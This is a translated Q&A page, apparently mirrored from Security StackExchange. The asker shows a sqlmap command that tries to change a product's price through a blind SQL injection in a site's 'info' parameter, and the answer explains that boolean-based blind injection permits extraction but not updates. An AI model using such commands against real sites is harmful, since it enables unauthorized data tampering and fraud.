首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >如何使用sqlmap更新表,而不需要堆叠查询?

如何使用sqlmap更新表,而不需要堆叠查询?
EN

Security用户
提问于 2017-03-26 02:06:45
回答 1查看 8K关注 0票数 4

我试着用下面的代码来投票

代码语言:javascript
复制
sqlmap -u "http://exp.com/portal/pd.jsp action=edit&info=products&sub_info=price" 
--cookie="JSESSIONID....." --dbms Oracle -D PRODUCTS -T PRICE --threads 10
--sql-query="UPDATE PRICE SET PRICE ='100' WHERE PRODUCTID LIKE '7534' AND PRODUCTCODE = '73546'" 

我之前检查过这个链接,它在info参数(基于布尔的盲)中是可注入的。执行上述代码的结果是:

代码语言:javascript
复制
warning: "execution of custom SQL queries is only available when stacked queries are supported"

有什么办法可以解决这个问题吗?

这个网站运行在Apache、JSP和Oracle上。

EN

回答 1

Security用户

发布于 2017-03-26 02:17:35

这里没有解决办法。通常可以使用基于布尔值的sql注入漏洞转储整个数据库,但不能执行更新。

您可以提取但不能插入或修改现有数据。

票数 1
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/154917

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档